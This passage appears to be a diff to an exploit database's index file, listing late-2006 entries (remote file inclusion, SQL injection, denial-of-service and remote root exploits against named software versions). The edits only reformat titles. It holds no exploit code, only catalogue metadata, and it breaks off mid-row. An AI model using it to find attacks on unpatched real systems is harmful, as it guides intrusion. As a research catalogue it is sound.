-2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion",2006-12-11,bd0rk,php,webapps,0 +2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 - (common.php) Remote Inclusion",2006-12-11,bd0rk,php,webapps,0 2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Include",2006-12-11,3l3ctric-Cracker,php,webapps,0 -2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 (interface.php) Remote File Include",2006-12-11,DeltahackingTEAM,php,webapps,0 +2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 - (interface.php) Remote File Include",2006-12-11,DeltahackingTEAM,php,webapps,0 2921,platforms/php/webapps/2921.txt,"mxBB Module mx_modsdb 1.0 - Remote File Include",2006-12-12,Lu7k,php,webapps,0 2922,platforms/windows/dos/2922.txt,"Microsoft Word Document - (malformed pointer) Proof of Concept",2006-12-12,DiscoJonny,windows,dos,0 -2923,platforms/php/webapps/2923.txt,"BLOG:CMS <= 4.1.3 (NP_UserSharing.php) Remote Inclusion",2006-12-12,"HACKERS PAL",php,webapps,0 +2923,platforms/php/webapps/2923.txt,"BLOG:CMS <= 4.1.3 - (NP_UserSharing.php) Remote Inclusion",2006-12-12,"HACKERS PAL",php,webapps,0 2924,platforms/php/webapps/2924.txt,"mxBB Module kb_mods <= 2.0.2 - Remote Inclusion Vulnerabilities",2006-12-12,3l3ctric-Cracker,php,webapps,0 2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion Exploit",2006-12-12,3l3ctric-Cracker,php,webapps,0 -2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 (LIST/NLST) Denial of Service Exploit",2006-12-13,shinnai,windows,dos,0 -2927,platforms/php/webapps/2927.txt,"PhpMyCMS <= 0.3 (basic.inc.php) Remote File Include",2006-12-13,v1per-haCker,php,webapps,0 +2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service Exploit",2006-12-13,shinnai,windows,dos,0 +2927,platforms/php/webapps/2927.txt,"PhpMyCMS <= 0.3 - (basic.inc.php) Remote File Include",2006-12-13,v1per-haCker,php,webapps,0 2928,platforms/linux/dos/2928.py,"ProFTPD <= 1.3.0a - (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0 -2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 (DLL-load hijacking) Code Execution Exploit PoC",2006-12-14,"Aviv Raff",windows,dos,0 +2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load hijacking) Code Execution Exploit PoC",2006-12-14,"Aviv Raff",windows,dos,0 2930,platforms/php/webapps/2930.pl,"yaplap <= 0.6.1b (ldap.php) Remote File Include Exploit",2006-12-14,DeltahackingTEAM,php,webapps,0 2931,platforms/php/webapps/2931.txt,"AR Memberscript (usercp_menu.php) Remote File Include",2006-12-14,ex0,php,webapps,0 -2933,platforms/linux/remote/2933.c,"OpenLDAP <= 2.4.3 (KBIND) Remote Buffer Overflow Exploit",2006-12-15,"Solar Eclipse",linux,remote,389 -2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 (SIZE) Remote Denial of Service Exploit",2006-12-15,rgod,windows,dos,0 -2935,platforms/windows/dos/2935.sh,"Windows Media Player 9/10 (MID File) Denial of Service Exploit",2006-12-15,sehato,windows,dos,0 -2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 (ld.so.preload) Remote Root Exploit",2006-12-15,kingcope,linux,remote,21 +2933,platforms/linux/remote/2933.c,"OpenLDAP <= 2.4.3 - (KBIND) Remote Buffer Overflow Exploit",2006-12-15,"Solar Eclipse",linux,remote,389 +2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service Exploit",2006-12-15,rgod,windows,dos,0 +2935,platforms/windows/dos/2935.sh,"Windows Media Player 9/10 - (MID File) Denial of Service Exploit",2006-12-15,sehato,windows,dos,0 +2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - (ld.so.preload) Remote Root Exploit",2006-12-15,kingcope,linux,remote,21 2937,platforms/php/webapps/2937.php,"extreme-fusion <= 4.02 - Remote Code Execution Exploit",2006-12-16,Kacper,php,webapps,0 -2938,platforms/php/webapps/2938.htm,"Bandwebsite <= 1.5 (Login) Remote Add Admin Exploit",2006-12-16,H0tTurk-,php,webapps,0 +2938,platforms/php/webapps/2938.htm,"Bandwebsite <= 1.5 - (Login) Remote Add Admin Exploit",2006-12-16,H0tTurk-,php,webapps,0 2939,platforms/php/webapps/2939.txt,"mxBB Module WebLinks <= 2.05 - Remote Inclusion",2006-12-16,ajann,php,webapps,0 2940,platforms/php/webapps/2940.txt,"mxbb module charts <= 1.0.0 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 2941,platforms/php/webapps/2941.txt,"mxBB Module Meeting <= 1.1.2 - Remote FileInclusion",2006-12-16,ajann,php,webapps,0 -2942,platforms/windows/dos/2942.py,"Star FTP Server 1.10 (RETR) Remote Denial of Service Exploit",2006-12-17,Necro,windows,dos,0 +2942,platforms/windows/dos/2942.py,"Star FTP Server 1.10 - (RETR) Remote Denial of Service Exploit",2006-12-17,Necro,windows,dos,0 2943,platforms/php/webapps/2943.txt,"Azucar CMS <= 1.3 - (admin/index_sitios.php) File Inclusion",2006-12-18,nuffsaid,php,webapps,0 -2944,platforms/php/webapps/2944.txt,"VerliAdmin <= 0.3 (index.php) Remote File Include Exploit",2006-12-18,Kacper,php,webapps,0 -2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 (id_user) Remote SQL Injection",2006-12-18,"the master",php,webapps,0 +2944,platforms/php/webapps/2944.txt,"VerliAdmin <= 0.3 - (index.php) Remote File Include Exploit",2006-12-18,Kacper,php,webapps,0 +2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 - (id_user) Remote SQL Injection",2006-12-18,"the master",php,webapps,0 2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control (ole32.dll) Denial of Service Exploit",2006-12-18,shinnai,windows,dos,0 -2947,platforms/multiple/dos/2947.pl,"wget <= 1.10.2 (Unchecked Boundary Condition) Denial of Service Exploit",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0 -2948,platforms/php/webapps/2948.txt,"RateMe <= 1.3.2 (main.inc.php) Remote File Include",2006-12-18,"Al7ejaz Hacker",php,webapps,0 +2947,platforms/multiple/dos/2947.pl,"wget <= 1.10.2 - (Unchecked Boundary Condition) Denial of Service Exploit",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0 +2948,platforms/php/webapps/2948.txt,"RateMe <= 1.3.2 - (main.inc.php) Remote File Include",2006-12-18,"Al7ejaz Hacker",php,webapps,0 2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption Exploit",2006-12-19,"Breno Silva Pinto",multiple,dos,0 2950,platforms/windows/local/2950.c,"DeepBurner 1.8.0 - (.dbr) File Parsing Buffer Overflow Exploit",2006-12-19,Expanders,windows,local,0 2951,platforms/multiple/remote/2951.sql,"Oracle <= 9i / 10g (extproc) - Local/Remote Command Execution Exploit",2006-12-19,"Marco Ivaldi",multiple,remote,0 -2952,platforms/windows/dos/2952.py,"WinFtp Server 2.0.2 (PASV) Remote Denial of Service Exploit",2006-12-19,shinnai,windows,dos,0 +2952,platforms/windows/dos/2952.py,"WinFtp Server 2.0.2 - (PASV) Remote Denial of Service Exploit",2006-12-19,shinnai,windows,dos,0 2953,platforms/php/webapps/2953.php,"PHP-Update <= 2.7 extract() Auth Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0 -2954,platforms/linux/dos/2954.html,"KDE 3.5 (libkhtml) <= 4.2.0 / Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 +2954,platforms/linux/dos/2954.html,"KDE 3.5 - (libkhtml) <= 4.2.0 / Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b (buycd.php) Remote File Include",2006-12-19,nuffsaid,php,webapps,0 2956,platforms/php/webapps/2956.txt,"phpProfiles <= 3.1.2b - Multiple Remote File Include Vulnerabilities",2006-12-19,nuffsaid,php,webapps,0 -2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x (protection.php) Remote File Include",2006-12-19,"Cold Zero",php,webapps,0 -2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 (archive.php) Remote File Include",2006-12-19,bd0rk,php,webapps,0 +2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - (protection.php) Remote File Include",2006-12-19,"Cold Zero",php,webapps,0 +2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 - (archive.php) Remote File Include",2006-12-19,bd0rk,php,webapps,0 2959,platforms/linux/remote/2959.sql,"Oracle <= 9i / 10g File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 -2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 (statistic.php) Remote File Include Exploit",2006-12-19,bd0rk,php,webapps,0 +2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - (statistic.php) Remote File Include Exploit",2006-12-19,bd0rk,php,webapps,0 2961,platforms/hardware/dos/2961.py,"Hewlett-Packard FTP Print Server <= 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0 2962,platforms/asp/webapps/2962.txt,"Burak Yilmaz Download Portal (down.asp) SQL Injection",2006-12-19,ShaFuck31,asp,webapps,0 -2963,platforms/asp/webapps/2963.txt,"cwmExplorer 1.0 (show_file) Source Code Disclosure",2006-12-19,ajann,asp,webapps,0 +2963,platforms/asp/webapps/2963.txt,"cwmExplorer 1.0 - (show_file) Source Code Disclosure",2006-12-19,ajann,asp,webapps,0 2964,platforms/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Include Vulnerabilities",2006-12-20,mdx,php,webapps,0 -2965,platforms/php/webapps/2965.txt,"TextSend <= 1.5 (config/sender.php) Remote File Include",2006-12-20,nuffsaid,php,webapps,0 -2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 (ActiveX Control) Denial of Service Exploit",2006-12-20,shinnai,windows,dos,0 +2965,platforms/php/webapps/2965.txt,"TextSend <= 1.5 - (config/sender.php) Remote File Include",2006-12-20,nuffsaid,php,webapps,0 +2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 - (ActiveX Control) Denial of Service Exploit",2006-12-20,shinnai,windows,dos,0 2967,platforms/windows/dos/2967.cs,"Microsoft Windows - (MessageBox) Memory Corruption Local Denial of Service",2006-12-20,anonymous,windows,dos,0 2968,platforms/php/webapps/2968.php,"PHP Advanced Transfer Manager <= 1.30 Source Code Disclosure Exploit",2006-12-20,Kacper,php,webapps,0 2969,platforms/php/webapps/2969.txt,"Php/Mysql Site Builder 0.0.2 - (htm2php.php) File Disclosure",2006-12-21,"the master",php,webapps,0 -2970,platforms/php/webapps/2970.txt,"Newxooper-php 0.9.1 (mapage.php) Remote File Include",2006-12-21,3l3ctric-Cracker,php,webapps,0 +2970,platforms/php/webapps/2970.txt,"Newxooper-php 0.9.1 - (mapage.php) Remote File Include",2006-12-21,3l3ctric-Cracker,php,webapps,0 2971,platforms/php/webapps/2971.txt,"PgmReloaded <= 0.8.5 - Multiple Remote File Include Vulnerabilities",2006-12-21,nuffsaid,php,webapps,0 -2972,platforms/windows/dos/2972.c,"DREAM FTP Server 1.0.2 (PORT) Remote Denial of Service Exploit",2006-12-21,InTeL,windows,dos,0 +2972,platforms/windows/dos/2972.c,"DREAM FTP Server 1.0.2 - (PORT) Remote Denial of Service Exploit",2006-12-21,InTeL,windows,dos,0 2973,platforms/php/webapps/2973.txt,"PowerClan <= 1.14a (footer.inc.php) Remote File Include",2006-12-21,nuffsaid,php,webapps,0 2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Transversal",2006-12-21,str0ke,windows,remote,0 2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Remote Blind SQL Injection Exploit",2006-12-21,DarkFig,php,webapps,0 2976,platforms/php/webapps/2976.txt,"inertianews 0.02b (inertianews_main.php) Remote Include",2006-12-21,bd0rk,php,webapps,0 -2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 (Urlobox) Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0 -2978,platforms/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 (USER) Format String DoS Exploit",2006-12-22,shinnai,windows,dos,0 -2979,platforms/php/webapps/2979.txt,"KISGB <= 5.1.1 (authenticate.php) Remote File Include",2006-12-22,mdx,php,webapps,0 +2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 - (Urlobox) Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0 +2978,platforms/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 - (USER) Format String DoS Exploit",2006-12-22,shinnai,windows,dos,0 +2979,platforms/php/webapps/2979.txt,"KISGB <= 5.1.1 - (authenticate.php) Remote File Include",2006-12-22,mdx,php,webapps,0 2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - (admin/auth.php) Remote Inclusion",2006-12-22,mdx,php,webapps,0 2981,platforms/php/webapps/2981.php,"open newsletter <= 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,php,webapps,0 2982,platforms/php/webapps/2982.txt,"3editor CMS <= 0.42 - (index.php) Local File Include",2006-12-22,3l3ctric-Cracker,php,webapps,0 -2983,platforms/php/webapps/2983.txt,"b2 Blog <= 0.5 (b2verifauth.php) Remote File Include",2006-12-23,mdx,php,webapps,0 -2984,platforms/php/webapps/2984.txt,"SH-News 0.93 (misc.php) Remote File Include Exploit",2006-12-23,bd0rk,php,webapps,0 -2985,platforms/windows/dos/2985.pl,"acFTP FTP Server 1.5 (REST/PBSZ) Remote Denial of Service Exploit",2006-12-23,gbr,windows,dos,0 -2986,platforms/asp/webapps/2986.txt,"Enthrallweb ePhotos 1.0 (subLevel2.asp) SQL Injection",2006-12-23,ajann,asp,webapps,0 +2983,platforms/php/webapps/2983.txt,"b2 Blog <= 0.5 - (b2verifauth.php) Remote File Include",2006-12-23,mdx,php,webapps,0 +2984,platforms/php/webapps/2984.txt,"SH-News 0.93 - (misc.php) Remote File Include Exploit",2006-12-23,bd0rk,php,webapps,0 +2985,platforms/windows/dos/2985.pl,"acFTP FTP Server 1.5 - (REST/PBSZ) Remote Denial of Service Exploit",2006-12-23,gbr,windows,dos,0 +2986,platforms/asp/webapps/2986.txt,"Enthrallweb ePhotos 1.0 - (subLevel2.asp) SQL Injection",2006-12-23,ajann,asp,webapps,0 2987,platforms/asp/webapps/2987.txt,"Enthrallweb eHomes 1.0 - Multiple (SQL/XSS) Vulnerabilities",2006-12-23,ajann,asp,webapps,0 2988,platforms/asp/webapps/2988.pl,"Enthrallweb eJobs (newsdetail.asp) Remote SQL Injection Exploit",2006-12-23,ajann,asp,webapps,0 -2989,platforms/asp/webapps/2989.txt,"Enthrallweb eCars 1.0 (types.asp) Remote SQL Injection",2006-12-23,ajann,asp,webapps,0 -2990,platforms/asp/webapps/2990.pl,"Enthrallweb emates 1.0 (newsdetail.asp) Remote SQL Injection Exploit",2006-12-23,ajann,asp,webapps,0 +2989,platforms/asp/webapps/2989.txt,"Enthrallweb eCars 1.0 - (types.asp) Remote SQL Injection",2006-12-23,ajann,asp,webapps,0 +2990,platforms/asp/webapps/2990.pl,"Enthrallweb emates 1.0 - (newsdetail.asp) Remote SQL Injection Exploit",2006-12-23,ajann,asp,webapps,0 2991,platforms/asp/webapps/2991.pl,"Enthrallweb ePages (actualpic.asp) Remote SQL Injection Exploit",2006-12-23,ajann,asp,webapps,0 -2992,platforms/asp/webapps/2992.txt,"Dragon Business Directory <= 3.01.12 (ID) SQL Injection",2006-12-23,ajann,asp,webapps,0 -2993,platforms/asp/webapps/2993.txt,"Calendar MX BASIC <= 1.0.2 (ID) Remote SQL Injection",2006-12-23,ajann,asp,webapps,0 +2992,platforms/asp/webapps/2992.txt,"Dragon Business Directory <= 3.01.12 - (ID) SQL Injection",2006-12-23,ajann,asp,webapps,0 +2993,platforms/asp/webapps/2993.txt,"Calendar MX BASIC <= 1.0.2 - (ID) Remote SQL Injection",2006-12-23,ajann,asp,webapps,0 2994,platforms/asp/webapps/2994.htm,"Enthrallweb eClassifieds 1.0 - Remote User Pass Change Exploit",2006-12-23,ajann,asp,webapps,0 2995,platforms/asp/webapps/2995.htm,"Enthrallweb eCoupons 1.0 - (myprofile.asp) Remote Pass Change Exploit",2006-12-23,ajann,asp,webapps,0 2996,platforms/asp/webapps/2996.htm,"Enthrallweb eNews 1.0 - Remote User Pass Change Exploit",2006-12-23,ajann,asp,webapps,0 -2997,platforms/asp/webapps/2997.pl,"File Upload Manager <= 1.0.6 (detail.asp) Remote SQL Injection Exploit",2006-12-24,ajann,asp,webapps,0 -2998,platforms/asp/webapps/2998.pl,"Newsletter MX <= 1.0.2 (ID) Remote SQL Injection Exploit",2006-12-24,ajann,asp,webapps,0 -2999,platforms/php/webapps/2999.pl,"Ultimate PHP Board <= 2.0b1 (chat/login.php) Code Execution Exploit",2006-12-24,nuffsaid,php,webapps,0 -3000,platforms/php/webapps/3000.pl,"Pagetool CMS <= 1.07 (pt_upload.php) Remote File Include",2006-12-24,g00ns,php,webapps,0 -3001,platforms/asp/webapps/3001.txt,"Ananda Real Estate <= 3.4 (agent) Remote SQL Injection",2006-12-24,ajann,asp,webapps,0 +2997,platforms/asp/webapps/2997.pl,"File Upload Manager <= 1.0.6 - (detail.asp) Remote SQL Injection Exploit",2006-12-24,ajann,asp,webapps,0 +2998,platforms/asp/webapps/2998.pl,"Newsletter MX <= 1.0.2 - (ID) Remote SQL Injection Exploit",2006-12-24,ajann,asp,webapps,0 +2999,platforms/php/webapps/2999.pl,"Ultimate PHP Board <= 2.0b1 - (chat/login.php) Code Execution Exploit",2006-12-24,nuffsaid,php,webapps,0 +3000,platforms/php/webapps/3000.pl,"Pagetool CMS <= 1.07 - (pt_upload.php) Remote File Include",2006-12-24,g00ns,php,webapps,0 +3001,platforms/asp/webapps/3001.txt,"Ananda Real Estate <= 3.4 - (agent) Remote SQL Injection",2006-12-24,ajann,asp,webapps,0 3002,platforms/php/webapps/3002.php,"HLStats <= 1.34 - (hlstats.php) Remote SQL Injection Exploit",2006-12-25,"Michael Brooks",php,webapps,0 -3003,platforms/php/webapps/3003.txt,"Jinzora <= 2.7 (include_path) Multiple Remote File Include Vulnerabilities",2006-12-25,nuffsaid,php,webapps,0 +3003,platforms/php/webapps/3003.txt,"Jinzora <= 2.7 - (include_path) Multiple Remote File Include Vulnerabilities",2006-12-25,nuffsaid,php,webapps,0 3004,platforms/php/webapps/3004.txt,"eNdonesia 8.4 - (mod.php/friend.php/admin.php) Multiple Vulnerabilities",2006-12-25,z1ckX(ru),php,webapps,0 -3005,platforms/php/webapps/3005.pl,"MTCMS <= 2.0 (admin/admin_settings.php) Remote File Include Exploit",2006-12-25,nuffsaid,php,webapps,0 -3006,platforms/php/webapps/3006.txt,"PhpbbXtra 2.0 (phpbb_root_path) Remote File Include",2006-12-25,"Mehmet Ince",php,webapps,0 +3005,platforms/php/webapps/3005.pl,"MTCMS <= 2.0 - (admin/admin_settings.php) Remote File Include Exploit",2006-12-25,nuffsaid,php,webapps,0 +3006,platforms/php/webapps/3006.txt,"PhpbbXtra 2.0 - (phpbb_root_path) Remote File Include",2006-12-25,"Mehmet Ince",php,webapps,0 3007,platforms/php/webapps/3007.txt,"Irokez CMS <= 0.7.1 - Multiple Remote File Include Vulnerabilities",2006-12-25,nuffsaid,php,webapps,0 -3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator <= 1.0.1 (path) Remote File Include Exploit",2006-12-25,DeltahackingTEAM,php,webapps,0 +3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator <= 1.0.1 - (path) Remote File Include Exploit",2006-12-25,DeltahackingTEAM,php,webapps,0 3009,platforms/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - (mod_root) RFI",2006-12-25,"Mehmet Ince",php,webapps,0 3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - (basepath) RFI",2006-12-25,"Mehmet Ince",php,webapps,0 3011,platforms/php/webapps/3011.pl,"Fishyshoop <= 0.930b Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0 -3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 (ataturk.php) Remote File Include",2006-12-25,ShaFuck31,php,webapps,0 +3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - (ataturk.php) Remote File Include",2006-12-25,ShaFuck31,php,webapps,0 3013,platforms/windows/dos/3013.py,"Microsoft Windows NetrWkstaUserEnum() Remote DoS Exploit (0Day)",2006-12-25,h07,windows,dos,0 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Remote Upload File / Code Execution",2006-12-25,CorryL,php,webapps,0 -3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 (main) Remote SQL Injection Exploit",2006-12-26,ajann,asp,webapps,0 +3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 - (main) Remote SQL Injection Exploit",2006-12-26,ajann,asp,webapps,0 3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0 3017,platforms/php/webapps/3017.php,"php-update <= 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb <= 2.0.1b Remote File Include",2006-12-26,bd0rk,php,webapps,0 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b (cal_dir) Remote File Include Vulnerabilities",2006-12-26,Cr@zy_King,php,webapps,0 -3020,platforms/php/webapps/3020.pl,"PHP-Update <= 2.7 (admin/uploads.php) Remote Code Execution Exploit",2006-12-26,undefined1_,php,webapps,0 +3020,platforms/php/webapps/3020.pl,"PHP-Update <= 2.7 - (admin/uploads.php) Remote Code Execution Exploit",2006-12-26,undefined1_,php,webapps,0 3021,platforms/linux/remote/3021.txt,"ProFTPD <= 1.2.9 rc2 - (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 3023,platforms/linux/dos/3023.c,"KsIRC 1.3.12 - (PRIVMSG) Remote Buffer Overflow PoC",2006-12-26,"Federico L. Bossi Bonin",linux,dos,0 3024,platforms/windows/local/3024.c,"Microsoft Windows NtRaiseHardError Csrss.exe Memory Disclosure Exploit",2006-12-27,"Ruben Santamarta ",windows,local,0 -3025,platforms/php/webapps/3025.pl,"Yrch 1.0 (plug.inc.php path variable) Remote File Include Exploit",2006-12-27,DeltahackingTEAM,php,webapps,0 -3026,platforms/php/webapps/3026.txt,"Bubla <= 1.0.0rc2 (bu/process.php) Remote File Include",2006-12-27,DeltahackingTEAM,php,webapps,0 +3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - (plug.inc.php path variable) Remote File Include Exploit",2006-12-27,DeltahackingTEAM,php,webapps,0 +3026,platforms/php/webapps/3026.txt,"Bubla <= 1.0.0rc2 - (bu/process.php) Remote File Include",2006-12-27,DeltahackingTEAM,php,webapps,0 3027,platforms/php/webapps/3027.txt,"Fantastic News <= 2.1.4 - Multiple Remote File Include Vulnerabilities",2006-12-27,Mr-m07,php,webapps,0 3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Include",2006-12-27,"Mehmet Ince",php,webapps,0 3029,platforms/php/webapps/3029.php,"Cacti <= 0.8.6i - cmd.php popen() Remote Injection Exploit",2006-12-27,rgod,php,webapps,0 3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 ierpplug.dll Internet Explorer 7 - Denial of Service Exploit",2006-12-28,shinnai,windows,dos,0 3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - (faqDsp.asp catcode) Remote SQL Injection",2006-12-28,ajann,asp,webapps,0 3032,platforms/asp/webapps/3032.txt,"wywo inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0 -3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 (Acronym Mod) Remote SQL Injection",2006-12-28,"the master",php,webapps,0 +3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 - (Acronym Mod) Remote SQL Injection",2006-12-28,"the master",php,webapps,0 3034,platforms/windows/dos/3034.py,"AIDeX Mini-WebServer <= 1.1 - Remote Denial of Service Crash Exploit",2006-12-28,shinnai,windows,dos,0 -3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 (admin.asp) Login ByPass SQL Injection",2006-12-28,ajann,asp,webapps,0 +3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 - (admin.asp) Login ByPass SQL Injection",2006-12-28,ajann,asp,webapps,0 3036,platforms/php/webapps/3036.php,"WebText <= 0.4.5.2 - Remote Code Execution Exploit",2006-12-28,Kacper,php,webapps,0 3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow Exploit",2006-12-29,rgod,windows,remote,4002 3038,platforms/windows/dos/3038.php,"Durian Web Application Server 3.02 - Denial of Service Exploit",2006-12-29,rgod,windows,dos,0 3039,platforms/php/webapps/3039.txt,"EasyNews PRO News Publishing 4.0 Password Disclosure",2006-12-29,bd0rk,php,webapps,0 3041,platforms/windows/dos/3041.html,"Macromedia Flash 8 (Flash8b.ocx) Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos,0 3042,platforms/windows/dos/3042.html,"Macromedia Shockwave 10 (SwDir.dll) Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos,0 -3043,platforms/php/webapps/3043.txt,"x-news 1.1 (users.txt) Remote Password Disclosure",2006-12-30,bd0rk,php,webapps,0 +3043,platforms/php/webapps/3043.txt,"x-news 1.1 - (users.txt) Remote Password Disclosure",2006-12-30,bd0rk,php,webapps,0 3044,platforms/php/webapps/3044.txt,"Voodoo chat 1.0RC1b (users.dat) Password Disclosure",2006-12-30,bd0rk,php,webapps,0 3045,platforms/php/webapps/3045.php,"Cacti 0.8.6i (copy_cacti_user.php) SQL Injection Create Admin Exploit",2006-12-30,rgod,php,webapps,0 -3046,platforms/asp/webapps/3046.txt,"SoftArtisans SAFileUp 5.0.14 (viewsrc.asp) Script Source Disclosure",2006-12-30,"Inge Henriksen",asp,webapps,0 -3047,platforms/php/webapps/3047.txt,"FreeStyle Wiki <= 3.6.2 (user.dat) Password Disclosure",2006-12-30,bd0rk,php,webapps,0 +3046,platforms/asp/webapps/3046.txt,"SoftArtisans SAFileUp 5.0.14 - (viewsrc.asp) Script Source Disclosure",2006-12-30,"Inge Henriksen",asp,webapps,0 +3047,platforms/php/webapps/3047.txt,"FreeStyle Wiki <= 3.6.2 - (user.dat) Password Disclosure",2006-12-30,bd0rk,php,webapps,0 3048,platforms/asp/webapps/3048.pl,"Click N Print Coupons <= 2006.01 - (key) Remote SQL Injection Exploit",2006-12-30,ajann,asp,webapps,0 3049,platforms/php/webapps/3049.php,"IMGallery <= 2.5 Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0 3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge (boarddir) Remote File Include",2006-12-30,"Mehmet Ince",php,webapps,0 3051,platforms/php/webapps/3051.txt,"Enigma 2 WordPress Bridge (boarddir) - Remote File Include",2006-12-30,"Mehmet Ince",php,webapps,0 3052,platforms/windows/dos/3052.c,"Microsoft Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free",2006-12-31,"Ruben Santamarta ",windows,dos,0 3053,platforms/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure Vulnerablity",2006-12-31,3l3ctric-Cracker,php,webapps,0 -3054,platforms/php/webapps/3054.txt,"P-News 1.16 / 1.17 (user.dat) Remote Password Disclosure Vulnerablity",2006-12-31,3l3ctric-Cracker,php,webapps,0 +3054,platforms/php/webapps/3054.txt,"P-News 1.16 / 1.17 - (user.dat) Remote Password Disclosure Vulnerablity",2006-12-31,3l3ctric-Cracker,php,webapps,0 3055,platforms/windows/remote/3055.html,"WinZIP 10.0 FileView ActiveX Controls Remote Overflow Exploit",2006-12-31,XiaoHui,windows,remote,0 -3056,platforms/windows/dos/3056.pl,"Formbankserver 1.9 (Name) Remote Denial of Service Exploit",2006-12-31,Bl0od3r,windows,dos,0 -3057,platforms/php/webapps/3057.php,"MDForum <= 2.0.1 (PNSVlang) Remote Code Execution Exploit",2006-12-31,Kacper,php,webapps,0 +3056,platforms/windows/dos/3056.pl,"Formbankserver 1.9 - (Name) Remote Denial of Service Exploit",2006-12-31,Bl0od3r,windows,dos,0 +3057,platforms/php/webapps/3057.php,"MDForum <= 2.0.1 - (PNSVlang) Remote Code Execution Exploit",2006-12-31,Kacper,php,webapps,0 3058,platforms/windows/remote/3058.html,"Rediff Bol Downloader (ActiveX Control) Execute Local File Exploit",2006-12-31,"Gregory R. Panakkal",windows,remote,0 -3059,platforms/php/webapps/3059.txt,"Bubla <= 0.9.2 (bu_dir) Multiple Remote File Include Vulnerabilities",2006-12-31,DeltahackingTEAM,php,webapps,0 -3060,platforms/asp/webapps/3060.txt,"RBlog 1.0 (admin.mdb) Remote Password Disclosure 